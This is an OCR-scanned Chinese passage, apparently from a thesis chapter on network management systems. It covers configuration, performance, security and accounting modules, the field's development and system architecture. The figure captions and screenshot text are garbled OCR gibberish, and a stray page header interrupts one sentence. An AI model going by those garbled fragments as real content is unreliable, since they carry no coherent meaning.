网 络 管理 系统 一 般 都 用 于 较 大 型 的 网 络 中 ， 需 要 管理 的 设备 是 非常 多 的 ， 为 了 减轻 管 
理 员 的 工作 量 ， 更 是 为 了 减少 复杂 性 给 管理 员 造 成 的 不 必要 的 失误 风险 ， 配 置 管 理 模块 一 
般 都 具有 对 配置 信息 的 自动 获取 能 力 。 这 样 即使 设备 众多 ， 或 者 管理 员 不 是 非常 熟悉 网 络 
结构 和 配置 情况 ， 网 络 管理 系统 也 能 通过 相关 技术 如 拓扑 自动 发 现 等 完成 对 网 络 的 配置 和 
管理 ， 如 图 11-4 所 示 。 一 般 网 络 管理 系统 获取 配置 信息 的 类 型 有 三 种 : 第 一 种 是 通过 
SNMP 或 CMIP 等 协议 读 取 的 MIB 库 中 的 配置 信息 ， 如 图 11-5 所 示 ; 第 二 种 是 虽然 不 在 
MIB 库 中 定义 ， 但 是 属于 对 设备 运行 比较 重要 的 配置 信息 ， 第 三 种 是 用 于 管理 的 一 些 辅助 
配置 信息 。 

2) ”自动 配置 能 力 

配置 管理 模块 应 具有 自动 配置 、 自 动 备份 功能 ， 根 据 管理 员 定 制 的 策略 ， 网 络 管理 系 
统 应 具有 自动 配置 设备 和 服务 的 能 力 。 通 常情 况 下 ， 自 动 配置 和 自动 备份 都 是 通过 系统 提 
供给 管理 员 的 图 形 策略 设置 界面 或 配置 导航 来 完成 的 ， 其 实现 方式 通常 有 两 种 : 一 种 是 通 
过 标准 的 网 络 管理 协议 中 定义 的 写 操作 ， 如 SNMP 协议 中 的 set 操作 ; 另 一 种 是 自动 登录 
到 设备 上 进行 相关 配置 操作 ， 如 图 11-6 所 示 。 

3) ”一致 性 检查 能 力 

在 一 个 大 型 网 络 中 ， 由 于 网 络 设备 数量 众多 ， 这 些 设备 可 能 是 由 多 个 管理 人 员 进 行 配 
置 的 ， 即 使 是 同一 个 管理 员 对 设备 进行 的 配置 ， 也 可 能 会 由 于 各 种 原因 导致 配置 一 致 性 的 
问题 。 因 此 ， 对 整个 网 络 的 配置 情况 进行 一 致 性 检查 是 必需 的 。 
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图 11-5 自动 获取 交换 机 端口 示意 图 


国 交 执 机 闽 作 窗口 水 四 加 
界面 纪 f 
、 界 面 风 作 党 明 : 
1， 限 标 村 动人 
2、 此 界面 是 
、 《MAC 信息” 
3 此 界面 进行 “ 交 执 机 辽 置 名 份 ” 


-地理 位 置信 息 ”、“ 部 门 信息 ” 


VIP-MAC 和 二、 解 时 ”的 拘 作 


二 、 丈 执 和 B 杜 备份 访 涅 : 
换 相 六 的 相 拉 人 其 本 《 可 这 ) 一 -久生 六 的 机 信息 -> 立 换 机 配置 备份 栋 作 


IP-MACe 志 、 解 二 流程 


捕 铝 交换机 信息 一 ~ 编 铝 VLAN 信 息 一 编 铝 MAC 信 息 -IFP-MAC 岩 定 、 解 名 抬 作 
均 换 机 操作 只 而 
丈 执 机 阳 丰 地 再 (得 部门 全 息 


——>| UE | Mc 人 na 
《区 拒 机 配置 各 各 》 《CIP MAC 洗 定 洽 作 》 


11-6 ”交换 机 自动 配置 界面 示意 图 
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4) ”操作 审计 能 
网 络 管理 系统 需要 保证 配置 操作 的 安全 性 ， 应 具有 记录 用 户 进行 每 一 次 配置 操作 的 能 
力 ， 同 时 应 具有 可 控制 用 户 操作 权限 和 操作 范围 ， 对 用 户 操作 进行 审计 的 能 


3. 性 能 管理 模块 


性 能 管理 模块 负责 评估 网 络 或 系统 的 运行 状况 及 通信 效率 等 性 能 指标 ， 包 括 监视 和 分 
析 被 控 设 备 及 其 所 提供 服务 的 性 能 机 制 。 性 能 分 析 的 结果 常用 于 某 个 诊断 测试 过 程 中 或 初 
始 配置 、 更 新 配置 时 的 网 络 性 能 测量 。 性 能 管理 模块 负责 收集 分 析 当 前 网 络 中 有 关 性 能 指 
标的 信息 ， 它 常 包含 以 下 典型 功能 。 

1) ”性 能 监控 

监控 网 络 中 用 户 指定 的 被 控 对 象 及 其 属性 ， 其 对 象 类 型 包括 链 路 、 交 换 机 、 路 由 器 、 
服务 器 等 ， 被 控 对 象 的 属性 则 常 指 流 量 、 延 迟 、 丢 包 率 、CPU 利用 率 、 内 存 利用 率 等 性 
能 指标 。 性 能 监控 通常 分 为 轮 询 监控 方式 和 实时 监控 方式 ， 对 于 每 个 被 控 对 象 ， 系 统 通 过 
数据 采集 器 定时 /实时 采集 其 性 能 数据 ， 并 自动 生成 性 能 报告 。 通 常情 况 下 ， 轮 询 监 控 作 
为 一 种 长 期 的 性 能 监控 策略 来 执行 ， 而 实时 性 能 监控 则 是 通过 系统 提供 的 一 系列 实时 数据 
采集 、 分 析 和 可 视 化 工具 ， 用 以 对 流量 、 负 载 、 丢 包 、 温 度 、 内 存 、 延 迟 等 网 络 设备 和 线 
路 的 性 能 指标 进行 临时 测试 和 分 析 ， 如 图 11-7 所 示 。 
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图 11-7 端口 流量 性 能 监控 界面 

2)” 闵 值 管理 

性 能 管理 模块 通常 可 为 每 个 监控 对 象 的 属性 设置 一 个 阔 值 ， 通 过 设置 阔 值 检查 开关 控 
制 阔 值 的 检查 和 告警 ， 提 供 相应 的 阔 值 管理 和 溢出 告警 机 制 。 

3) ”性 能 分 析 

指 的 是 对 历史 数据 进行 分 析 、 统 计 和 整理 ， 计 算 性 能 指标 的 平均 值 及 峰值 状况 ， 为 后 
期 的 网 络 规划 提供 参考 。 由 于 性 能 分 析 需 要 消耗 较 大 的 系统 资源 ， 因 此 一 般 的 网 络 管理 系 
统 提供 的 都 是 基础 性 能 指标 的 分 析 ， 但 对 于 一 些 大 型 的 网 络 ， 特 别 是 对 于 ISP 运营 商 ， 对 
于 历史 数据 的 分 析 就 显得 非常 重要 ， 它 们 通常 会 采用 一 些 数据 挖掘 的 算法 来 深化 性 能 的 分 
析 ， 并 对 数据 进行 扫描 和 处 理 ， 生 成 性 能 趋势 曲线 ， 以 直观 的 图 形 反映 性 能 分 析 的 结果 ， 
如 图 11-8 所 示 。 
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图 11-8 CPU 利用 率 图 形 报表 


4. 安全 管理 模块 


数据 的 保密 性 、 授 权 保护 和 访问 控制 等 是 网 络 安全 中 几 个 主要 的 问题 ， 一 般 网 络 管理 
系统 为 了 保证 更 好 的 安全 性 ， 也 会 相应 地 从 授权 机 制 、 访 问 控制 和 加 密 等 方式 来 进行 管 
理 ， 通 常 网 络 管理 系统 自身 的 安全 是 非常 重要 的 ， 它 一 般 可 采用 以 下 几 种 方式 来 保证 其 自 
身 的 安全 性 。 

(1) 采用 身份 认证 机 制 ， 通 过 口令 认证 或 密 钥 证 书 等 多 种 认证 方式 为 系统 提供 不 同 级 
别 用 户 的 身份 认证 方式 。 

(2) 加 密 存储 和 传输 过 程 中 的 管理 信息 ， 例 如 在 Web 浏览 器 和 网 络 管理 系统 服务 器 
之 间 采 用 SSL 传输 协议 ， 对 管理 信息 的 传输 进行 加 密 并 保证 其 完整 性 。 

(3) 用 户 组 管理 和 权限 控制 ， 一 般 系统 都 会 根据 管理 员 任务 类 型 的 不 同 将 用 户 分 成 若 
干 组 ， 并 为 不 同 用 户 组 指定 不 同 的 权限 范围 ， 从 而 利于 对 用 户 的 操作 进行 访问 控制 和 权限 
检查 ， 保 证 用 户 不 能 越权 使 用 网 络 管理 系统 。 


5. 计 费 管理 模块 


计 费 管理 模块 主要 是 为 了 控制 和 监测 网 络 资源 开销 的 费用 和 代价 ， 这 对 一 些 公共 商业 
网 络 显得 尤为 重要 。 通 过 评估 用 户 使 用 网 络 资源 可 能 需要 付出 的 费用 和 代价 ， 管 理 员 可 以 
规定 用 户 使 用 资源 的 最 大 费用 限制 ， 从 而 控制 用 户 过 多 占用 和 使 用 有 限 的 网 络 资源 ， 这 从 
另 一 方面 提供 了 网 络 的 整体 使 用 效率 。 另 外 ， 当 用 户 出 于 某 种 目的 需要 使 用 多 种 网 络 资源 
时 ， 计 费 管理 模块 应 能 计算 出 资源 的 总 计 费 用 。 因 此 计 费 管理 模块 通常 应 包含 以 下 几 种 典 
型 功能 。 

1) “ 计 费 数据 采集 

计 费 数据 采集 是 整个 计 费 管理 模块 中 的 基础 ， 并 且 计 费 数据 的 采集 往往 受到 采集 设备 
软 硬 件 的 限制 ， 而 且 与 进行 计 费 的 网 络 资源 密切 相关 ， 因 此 计 费 采集 的 数据 往往 会 有 误 
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差 ， 不 能 和 专用 的 计 费 管理 设备 相提并论 。 

2) ”数据 管理 与 维护 功能 

计 费 管理 人 工交 互 性 很 强 ， 虽 然 有 很 多 数据 维护 可 以 靠 系 统 自动 完成 ， 但 仍然 需要 人 
为 地 参与 管理 ， 包 括 交纳 费用 的 输入 、 联 网 单位 信息 维护 ， 以 及 账单 样式 等 。 

3) ” 计 费 策略 设置 

由 于 计 费 策略 往往 是 灵活 变化 的 ， 因 此 应 实现 用 户 自由 设置 计 费 策略 的 功能 ， 这 样 就 
需要 提供 一 个 友好 的 人 机 界面 和 完善 的 实现 计 费 策略 的 数据 模型 。 

4) ”分 析 与 决策 支持 

计 费 管理 模块 可 利用 采集 的 网 络 资源 使 用 数据 ， 联 网 用 户 的 详细 信息 以 及 计 费 策略 计 
算 网 络 用 户 资源 的 使 用 情况 ， 并 计算 出 应 交纳 的 费用 。 为 了 便于 多 种 计 费 策略 的 比较 ， 通 
常 计 费 管理 模块 还 可 对 计 费 策略 数据 进行 比较 和 分 析 ， 为 政策 制定 提供 决策 依据 。 

5) ” 计 费 信息 查询 

计 费 管理 模块 应 具有 为 每 个 用 户 提供 关于 自身 使 用 资源 情况 的 详细 信息 ， 用 户 可 以 根 
据 这 些 信息 计算 、 查 看 和 核对 自身 的 计 费 情况 。 

目前 常用 的 网 络 管理 系统 按照 管理 对 象 的 不 同 可 分 为 网 元 管理 软件 (EMS) 和 通用 网 络 
管理 软件 (NMS) 两 大 类 。 其 中 网 元 管理 软件 以 网 络 设备 作为 单独 的 网 元 来 管理 ， 通 过 专用 
的 MIB 库 实现 对 设备 本 身 的 精细 管理 ， 例 如 思科 公司 的 Cisco Veiw 和 华为 公司 的 
Quidview 等 。 而 通用 网 络 管理 软件 的 管理 目标 则 覆盖 整个 网 络 ， 可 对 整 网 网 络 元 素 进行 
管理 ， 如 惠普 公司 的 HP OpenView、IBM 公司 的 TivoliNetView 等 ， 这 类 网 络 管理 系统 提 
供 一 个 第 三 方 的 网 管 平台 ， 支 持 对 所 有 SNMP 设备 的 发 现 和 监控 ， 通 过 和 不 同 厂商 合作 
获取 其 私有 的 MIB 库 并 集成 在 自己 的 平台 中 ， 从 而 实现 对 全 网 不 同 厂商 设备 的 设 别 和 统 
一 管理 。 


11.1.2 网络 管 理 系统 的 发 展 概述 


网 络 管理 已 经 成 为 计算 机 网 络 研究 建设 中 的 重要 内 容 之 一 。 虽 然 网 络 管理 的 概念 兴起 
在 十 几 年 前 ， 但 是 一 直 以 来 网 络 管理 思想 和 网 络 管理 技术 的 发 展 落后 于 网 络 技术 的 发 展 。 
如 何 提升 网 络 管理 的 有 效 性 ， 如 何 真正 做 到 网 络 管理 智能 化 ， 国 内 外 厂商 都 有 一 些 自己 的 
见解 和 做 法 ， 都 希望 在 网 络 管理 的 各 个 细 分 领域 内 找到 自己 的 立足 之 地 。 

为 了 有 效 合理 地 管理 现代 网 络 ， 国 际 电信 联盟 电信 标准 化 部 门 ITU-T) 于 1988 年 ， 参 
考 OSI 系统 管理 框架 提出 了 具有 标准 协议 、 接 口 和 体系 结构 的 管理 网 络 一 一 电信 管理 网 
(Telecommunication Management Net，TMN)， 作 为 管理 现代 电信 网 的 基础 。 考 虑 将 提供 业 
务 的 电信 网 及 其 管理 功能 进行 分 离 ， 使 管理 功能 从 电信 网 中 独立 出 来 单独 组 成 一 个 网 ， 即 
TMN。TMN 制定 了 一 系列 的 标准 和 管理 功能 ， 包 括 被 管 网 元 和 网 络 管理 系统 之 间 的 接口 
均 被 标准 化 了 。 只 要 被 管 网 元 和 网 络 管理 系统 之 间 遵循 TMN 标准 ， 完 成 一 定 的 管理 功 
能 ， 就 能 够 实现 不 同 厂 商 的 不 同 设备 以 及 不 同 网 络 管理 系统 之 间 的 互 连 互 通 操作 。TMN 
体系 结构 按照 不 同 的 管理 需求 将 整个 电信 网 管理 功能 从 低 到 高 分 作 5 层 : 网 元 层 (NEL)、 
网 元 管理 层 (EML)、 网 络 管理 层 (NML)、 业 务 管理 层 (SML)、 事 务 管理 层 (BMIL)。 
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1. 网 络 管理 系统 历经 的 发 展 阶段 


网 络 管理 系统 产品 的 发 展 一 般 经 历 了 以 下 4 个 阶段 。 

1) ”第 一 代 网 管 : 命令 行 网 管 

第 一 代 网 管 非常 简单 ， 一 般 是 利用 串口 或 远程 登录 方式 登录 到 设备 上 ， 利 用 命令 行 的 
方式 进行 设备 的 管理 。 它 的 缺点 是 不 能 及 时 、 主 动 地 发 现 网 络 中 存在 的 问题 ， 也 不 能 准确 
定位 故障 点 ， 因 此 实用 性 不 强 。 

2) “第 二 代 网 管 : 网 元 网 管 

这 个 阶段 的 网 管 系统 通常 利用 SNMP 协议 或 厂商 专 有 的 私有 协议 对 设备 网 元 进行 管 
理 ， 着 重 于 配置 管理 和 设备 级 管理 ， 通 常 仅 用 于 管理 本 厂商 的 设备 。 由 于 不 能 跨 厂 商 管 
理 ， 因 此 当 全 网 设备 类 型 比较 复杂 时 ， 不 利于 跨 平台 的 管理 。 

3) “第 三 代 网 管 : 第 三 方 网 管 

这 个 阶段 的 网 管 系统 通常 指 可 跨 厂 商 、 跨 平台 对 设备 和 服务 器 等 网 络 对 象 进行 管理 ， 
可 提供 设备 级 和 指标 级 的 管理 功能 ， 具 有 拓扑 发 现 、 性 能 分 析 、 告 警 设置 和 报表 生成 等 功 
能 ， 它 通常 依赖 于 标准 网 管 协议 的 实现 以 及 跨 厂商 的 技术 合作 实现 平台 的 通用 性 ， 因 此 在 
大 型 网 络 环境 中 非常 受用 户 的 欢迎 。 

4) “第 四 代 网 管 : 综合 业务 管理 系统 

在 第 三 代 网 管 系统 发 展 的 基础 上 ， 这 代 网 管 系统 专注 于 用 户 的 核心 业务 管理 、 服 务 水 
平 管理 、 网 络 健康 管理 等 多 种 业务 视角 ， 它 不 仅 是 作为 一 个 网 络 的 管理 系统 ， 更 是 一 个 网 
络 的 综合 解决 方案 的 体现 ， 并 且 通 过 智能 业务 模型 解决 了 用 户 日 益 复杂 的 IT 业务 资源 与 
运 维 人 员 数 量 和 专业 知识 的 矛盾 。 


2. 国内 网 络 管理 系统 的 发 展 特点 


自 国家 2000 年 出 台 《 鼓 励 软件 产业 和 集成 电路 产业 发 展 的 若干 政策 》 以 来 ， 我 国 软 
件 业 取得 了 长 足 的 发 展 。 但 由 于 国内 网 络 管理 软件 起 步 相对 较 晚 ， 在 软件 业 中 所 占 的 比重 
还 较 低 ， 但 随 着 信息 化 建设 的 不 断 推 进 ， 网 管 系统 正在 逐步 形成 一 个 重要 产业 。 网 管 软件 
市 场 的 发 展 也 已 从 初期 的 厂商 引导 购买 向 市 场 需求 驱动 方式 转变 ， 部 分 网 管 软件 厂商 则 开 
始 进入 国际 市 场 。 

目前 ， 国 内 网 管 软件 呈现 出 了 多 样 化 、 多 层次 、 多 级 别 的 特点 ， 其 应 用 日 益 细 化 ， 分 
工 越 来 越 明确 。 按 照管 理 对 象 的 不 同 ， 网 管 软件 可 以 分 为 系统 管理 软件 和 设备 管理 软件 ， 
如 华为 等 公司 推出 的 网 管 软件 是 对 其 网 络 设 备 进行 管理 ， 游 龙 科技 的 SiteView 等 网 管 软 
件 是 对 网 络 基础 架构 及 其 应 用 系统 进行 集中 式 管理 ， 神 州 泰 后 的 Ultr@NMS 网 管 软件 则 
面向 行业 用 户 需求 。 由 于 信息 量 的 急剧 增长 ， 存 储 类 网 管 软件 的 比例 也 将 快速 发 展 ， 同 时 
针对 网 络 安全 的 安全 管理 软件 ， 也 将 成 为 网 管 软件 市 场 的 主要 产品 。 

目前 国内 网 管 系统 的 发 展 呈现 了 如 下 明显 特征 。 

1) “在 技术 的 应 用 上 与 国际 保持 同步 

目前 国内 网 管 软件 企业 十 分 关注 国际 网 管 标准 的 制定 出 台 和 国际 相关 网 络 组 织 、 协 会 
的 最 新 动态 ， 因 此 能 够 及 时 预测 和 把 握 最 新 网 络 技术 ， 不 断 与 国际 接轨 。 国 际 上 最 新 推出 
的 各 种 网 管 技术 ， 都 会 很 快 在 我 国 网 管 行业 中 得 到 普及 和 应 用 。 对 于 其 中 的 部 分 技术 ， 我 
国 的 网 管 软件 已 能 结合 自身 应 用 的 特点 ， 进 行 深度 开发 和 利用 。 
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2) ”国外 厂商 加 快 了 本 土 化 服务 

网 管 软件 的 竞争 已 经 从 产品 竞争 延伸 到 服务 竞争 ， 其 管理 对 象 从 设备 管理 已 经 发 展 到 
面向 整个 IT 基础 架构 及 其 应 用 ， 随 着 用 户 的 网 络 基 础 架构 及 其 应 用 以 及 对 网 管 软件 的 要 
求 差异 越 来 越 大 ， 为 更 好 地 满足 用 户 的 差异 化 需求 ， 各 类 服务 及 二 次 开发 工作 显得 尤为 重 
要 。 面 对 国产 网 管 软件 的 压力 ， 国 外 网 管 软件 也 加 快 了 本 地 化 服务 的 步伐 ， 通 过 在 国内 设 
立 办 事 处 、 研 发 中 心 、 培 训 基地 以 及 与 国内 代理 商 合作 等 方式 来 为 国内 用 户 提供 服务 ， 如 
惠普 、CA 、IBM、 上 日立、 戴尔 等 厂家 均 已 加 快 拓展 其 在 中 国 的 网 络 管理 软件 业务 。 

3) ”本 土 企业 加 快 了 核心 技术 的 研发 

虽然 很 多 领先 的 网 管 技术 都 源 于 国外 ， 但 新 技术 在 国内 的 普及 非常 迅速 ， 国 内 网 管 厂 
商 大 都 具有 很 强 的 新 技术 捕捉 和 开发 能 力 ， 在 新 技术 和 新 产品 上 能 快速 跟 进 国际 水 准 ， 而 
在 一 些 特 色 应 用 上 也 达到 了 国际 水 平 。 国 外 成 熟 的 网 管 软件 产品 普遍 架构 庞大 而 复杂 ， 对 
新 技术 的 应 用 可 以 说 是 牵 一 发 而 动 全 身 ， 所 以 对 新 技术 的 采用 普遍 采取 比较 保守 的 策略 。 
而 国内 软件 业 虽 然 起 步 比 较 晚 ， 但 是 发 展 速度 非 同 一 般 ， 与 国际 软件 水 平 的 差距 正在 逐步 
缩小 。 网 管 软件 行业 也 不 例外 ， 本 土 企业 正在 进一步 掌握 核心 技术 ， 并 研发 自身 独特 的 
产品 。 

同时 ， 国 内 一 些 企业 已 经 在 IT 系统 管理 领域 ， 包 括 自主 产品 、 解 决 方案 和 专业 服务 
三 个 方面 取得 了 长 足 进 展 。 在 网 络 系统 管理 方面 ， 已 能 提供 自主 版 权 、 符 合 国际 标准 和 国 
内 实际 的 网 络 和 系统 管理 软件 ， 同 时 也 提供 国外 著名 平台 产品 及 深度 定制 和 开发 的 增值 解 
决 方案 ;在 信息 安全 管理 方面 ， 则 提供 了 自主 版 权 的 安全 管理 控制 中 心软 件 和 安全 运营 流 
程 管理 软件 ， 在 运营 流程 管理 领域 ， 结 合 国际 最 佳 管理 实践 ， 提 供 了 客户 规范 管理 流程 ， 
优化 了 和 考核 业务 所 需 的 服务 水 平 。 

尽管 国内 的 IP 网 管 系列 开发 商 在 核心 技术 方面 与 国外 知名 大 家 仍 有 不 小 的 差距 ， 但 
国内 厂家 在 知识 产权 、 开 发 服务 、 文 化 传统 上 有 着 天 时 、 地 利 、 人 和 的 优势 ， 只 要 在 借鉴 
成 熟 、 先 进 产品 及 相关 技术 的 基础 上 不 断 探 索 ， 就 有 希望 在 与 国外 软件 开发 商 的 竞争 中 占 
得 先 机 。 


3. 网 络 管理 系统 的 发 展 趋势 


当今 ， 随 着 国际 安全 局 势 的 日 益 严峻 ， 以 及 人 们 对 安全 防范 意识 的 日 益 提高 ， 未 来 网 
络 监控 的 概念 可 以 归结 为 这 样 几 句 话 :网 络 监控 管理 要 求 达到 “5W”， 即 任何 一 个 授权 者 
(Whoeven) 无 论 在 任何 时 候 (Whenever)、 任 何 地 点 (Wherever)， 都 能 通过 任何 一 种 手段 
(However)， 以 获取 任何 一 个 被 监控 对 象 ( 人 或 设备 )(Whichever) 的 任何 信息 (Whatever)， 形 
成 一 个 高 度 智能 化 的 完备 的 监控 网 ， 这 是 未 来 监控 的 理想 模式 和 发 展 趋势 。 

总 的 来 说 ， 网 络 监控 及 管理 系统 的 发 展 趋势 可 概括 为 以 下 几 点 。 

1) 智能 化 

网 络 监控 及 管理 系统 进一步 实现 智能 化 ， 从 而 大 幅度 降低 管理 人 员 的 工作 压力 ， 提 高 
工作 效率 ， 真 正体 现 网 络 监控 及 管理 系统 的 作用 。 智 能 化 的 网 络 监 控 及 管理 系统 ， 应 该 能 
够 自动 获得 网 络 中 各 种 设备 的 技术 及 运行 参数 ， 从 而 自动 进行 分 析 、 诊 断 和 预警 。 

2) ”自动 化 

自动 化 的 网 络 监 控 及 管理 ， 能 大 幅度 地 减少 管理 人 员 的 工作 负担 ， 让 他 们 从 繁杂 的 事 
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物性 工作 中 解脱 出 来 ， 从 而 有 更 多 的 时 间 和 精力 来 思考 和 实施 网 络 的 性 能 提速 等 其 他 问 
题 。 未 来 网 络 系统 管理 员 要 做 的 仅仅 是 把 人 员 情 况 、 机 器 情况 ， 以 及 人 员 与 网 络 资源 之 间 
的 分 配 关 系 告诉 网 络 监控 及 管理 系统 ， 系 统 能 自动 地 建立 图 形 化 的 人 员 与 网 络 的 配置 关 
系 。 不 论 用 户 在 何 处 ， 只 要 登录 系统 ， 便 能 立刻 识别 用 户 身份 ， 而 且 还 可 以 自动 接 入 用 户 
所 需 的 企业 重要 资源 (如 电子 邮件 、Web， 电 子 科技 大 学 硕士 学 位 论文 视频 会 议 、ERP 以 
及 CRM 应 用 等 )， 而 且 该 系统 还 可 为 那些 对 企业 来 说 至 关 重 要 的 应 用 分 配 相 应 的 优先 权 。 

3) “ 易 用 性 

未 来 的 网 络 监控 及 管理 系统 将 在 易 用 性 上 进一步 得 到 完善 ， 系 统管 理 将 进一步 地 图 形 
化 、 简 单 化 和 易于 使 用 及 配置 ， 系 统 监控 的 数据 信息 应 该 可 以 动态 地 得 以 反映 。 

4) “集成 化 

集成 化 是 指 网 络 监控 及 管理 系统 将 传统 的 处 理 方式 集 于 一 身 ， 即 包括 系统 维护 、 系 统 
扫描 、 系 统 监控 以 及 系统 管理 等 。 

5) ”远程 管理 

管理 员 对 系统 的 监控 及 管理 不 必 局 限于 系统 所 在 局 域 网 内 ， 管 理 员 可 以 在 任何 地 方 通 
过 网 络 接 入 监控 及 管理 系统 ， 即 可 对 系统 进行 监控 和 管理 。 


11.1.3 网络 管理 系统 的 基本 架构 


通常 网 络 管理 的 需求 决定 了 网 络 管理 系统 的 基本 组 成 和 架构 ， 也 就 是 说 网 络 管理 的 各 
项 任务 和 功能 最 终 都 会 体现 在 网 络 管理 系统 的 功能 实现 上 ， 因 此 其 软件 架构 设计 是 整个 网 
管 系统 的 核心 。 一 般 网 络 管理 系统 的 基本 架构 可 以 归纳 为 三 大 部 分 ， 即 体系 结构 、 核 心 模 
块 和 应 用 程序 。 


1. 网 络 管理 系统 的 体系 结构 


首先 ， 在 基本 的 体系 框架 方面 ， 网 络 管理 系统 需要 提供 一 种 通用 的 、 开 放 的 、 可 扩展 
的 框架 体系 。 为 了 向 用 户 提供 最 大 的 选择 范围 ， 网 管 软件 应 该 支持 通用 平台 ， 如 既 支 持 
Unix 操作 系统 ， 又 支持 Windows NT 操作 系统 。 同 时 网 络 管理 系统 的 部 署 方 式 上 既 可 以 
是 分 布 式 的 体系 结构 ， 也 可 以 是 集中 式 的 体系 结构 ， 实 际 应 用 中 一 般 采 用 集中 管理 子 网 和 
分 布 式 管理 主 网 相 结合 的 方式 。 最 后 网 络 管理 系统 应 基于 开放 标准 的 框架 上 进行 设计 ， 应 
该 支持 现 有 的 协议 和 技术 的 升级 ， 开 放 的 网 络 管理 系统 既 可 以 支持 基于 标准 的 网 络 管理 协 
议 ， 如 SNMP 和 CMIP， 也 必须 能 支持 TCP/IP 协议 族 及 其 他 的 一 些 专用 的 网 络 协议 。 

目前 ， 大 多 数 网 络 管理 系统 在 设计 时 都 遵循 了 分 层 架 构 设 计 的 思想 ， 实 现 数据 采集 、 
数据 处 理 和 数据 呈现 三 者 之 间 的 分 离 ， 因 此 通常 分 为 三 个 大 的 层次 : 即 数据 采集 层 、 数 据 
处 理 层 和 功能 显示 层 ， 如 图 11-9 所 示 。 这 样 的 结构 设计 大 大 增强 了 系统 的 灵活 性 和 可 扩 
展 性 。 

1) “数据 采集 层 

数据 采集 层 通常 位 于 数据 处 理 层 与 管理 对 象 之 间 ， 通 过 与 网 元 设备 及 其 相关 业务 系统 
的 交互 ， 完 成 网 络 管理 系统 所 需 的 各 类 原始 数据 的 采集 ， 例 如 配置 数据 、 性 能 指标 、 故 障 
日 志 /报警 等 。 
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数 锯 尽 经 | 慎重 编 冲 
| SNMP, SSH. SYSLOG, ODBC, TCP. UDP, HTTP TELNET, JMX. 


ET 本 本 择 昌 ,， 


网 络 资源 拉 作 系统 数据库。 中 间 件 。 应 用 人 


图 11-9 网 络 管理 系统 基本 框架 示意 图 


2) ”数据 处 理 层 

数据 处 理 层 将 由 采集 层 所 得 的 各 类 数据 进行 清洗 、 转 换 、 整 理 等 标准 化 处 理 ， 然 后 进 
行 相应 的 处 理 分 析 、 统 计 和 存储 ， 通 过 触发 事件 发 生 器 ， 将 收集 到 的 各 类 原始 信息 与 闵 值 
进行 对 比分 析 ， 形 成 资源 分 类 的 告警 信息 等 。 

3) ”功能 显示 层 

针对 管理 信息 和 性 能 测试 数据 等 进行 统一 汇总 和 多 维 呈 现 ， 实 现 网 络 、 资 源 和 软 硬 件 
设备 的 统一 监控 和 管理 ， 保 障 业务 系统 的 正常 运行 

在 具体 的 功能 架构 上 则 通常 包括 对 象 层 、 对 象 采集 层 、 数 据 处 理 层 、 数 据 展 现 层 、 外 
部 接口 等 组 件 ， 其 管理 对 象 包 括 网 络 设备 、 安 全 设备 、 机 房 环 境 、 主 机 系统 、 数 据 库 系 
统 、 应 用 系统 等 ， 另 外 其 数据 采集 的 方式 多 种 多 样 ， 如 支持 分 布 式 主动 轮 询 或 被 动 接受 的 
方式 采集 数据 ， 支 持 标准 的 SNMP、Syslog、WMI、Telnet 等 协议 的 数据 采集 ， 支 持 数据 
库 接口 采集 ， 支 持 应 用 API 接口 采集 等 多 种 方式 ， 此 外 还 有 支持 集成 第 三 方 管理 平台 组 件 
进行 数据 采集 等 方式 。 


2. 网 络 管理 系统 的 核心 模块 


网 络 管理 系统 应 提供 一 些 核心 的 基本 服务 来 满足 网 络 管理 的 要 求 ， 大 多 数 厂商 往往 都 
是 通过 核心 服务 来 提高 自己 产品 的 竞争 力 ， 在 服务 扩展 时 通常 以 两 种 途径 来 实现 ， 一 种 是 
通过 改进 底层 系统 来 扩展 服务 ; 另 一 种 则 是 通过 增加 可 选 组 件 对 网 管 软件 的 功能 进行 扩 
充 。 核 心服 务 涉及 的 内 容 很 多 ， 各 个 厂商 也 有 很 大 差异 ， 但 目前 大 多 数 厂 商 的 产品 都 具备 
以 下 5 种 基本 服务 模块 。 

1) ”网 络 设备 监控 

@ 发现、 归档、 查询 可 网 管 设备 。 
查询 设备 信息 、 接 口 配置 、IP/MAC 地 址 转发 表 和 路 由 表 等 信息 。 
监测 接口 实时 带宽 和 历史 流量 ， 通 过 阔 值 设置 和 颜色 变化 警示 接口 异常 。 
CPU 负荷 等 参数 监测 。 
控制 接口 开 闭 ， 生 成 和 查询 接口 操作 日 志 。 


乙 


un 
= 
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网 络 链 路 监控 

自动 发 现 设备 之 间 的 端口 连接 关系 ， 物 理 拓 扑 图 方式 显示 连接 关系 及 实时 数据 ， 
数据 直接 显示 。 

定位 用 户 到 布线 端口 。 

标注 设备 物理 端口 ， 支 持 自动 读 取 和 人 工 添加 两 种 方式 。 

查询 设备 端口 的 使 用 和 连通 情况 。 

报警 、 归 档 计算 机 连接 端口 的 改变 。 

接 入 计算 机 监控 

自动 生成 接 入 档案 。 档 案 包括 每 一 台 入 网 计算 机 的 卫 地 址 、MAC 地 址 、 上 连 设 
备 端口 、 计 算 机 名 、 域 组 、 用 户 登 录 名 、 分 区 和 最 近 出 现时 间 。 系 统 具 有 学 习 功 
能 ， 能 够 自动 归档 新 计算 机 ; 系统 具有 同步 功能 ， 能 够 发 现 和 同步 档案 信息 的 
改变 。 

自动 生成 接 入 快照 ， 使 计算 机 上 线 动态 一 目 了 然 。 

自动 生成 接 入 日 志 ， 为 计算 机 网 络 使 用 提供 审计 依据 。 

自动 发 现 接 入 安全 事件 ， 报 警 新 计算 机 ， 报 警 IP 地 址 、 计 算 机 名 、 域 组 、 用 户 
登录 名 、 上 连 设备 端口 改变 。 

定位 和 隔离 计算 机 。 通 过 档案 、 快 照 或 日 志 查询 ， 可 以 快速 定位 并 通过 交换 机 端 
口 隔 离 计算 机 。 

监测 计算 机 的 实时 带宽 和 历史 流量 。 

服务 器 监控 

发 现 、 归 档 、 查 询 可 网 管 的 服务 器 和 桌面 。 

查询 网 络 连接 的 数量 、 类 型 、 地 址 和 带宽 。 

查询 打开 的 TCP 端口 及 其 连接 。 

查询 运行 的 程序 名 称 及 其 CPU、 内 存 使 用 。 

查询 安装 的 软件 名 称 。 

查询 存储 设备 的 类 型 、 总 容量 和 已 用 容量 ， 发 现 使 用 CD、 移 动 存储 设备 。 

CPU 负荷 监测 。 

查询 系统 配置 。 

告警 模块 

故障 TOP-N 表 ， 响 应 TOP-N 表 ， 可 用 TOP-N 表 。 

设备 、 服 务 器 、 服 务 无 响应 报警 。 

新 接 入 计算 机 报警 ， 计 算 机 上 连 设备 、 端 口 改 变 报警 。 


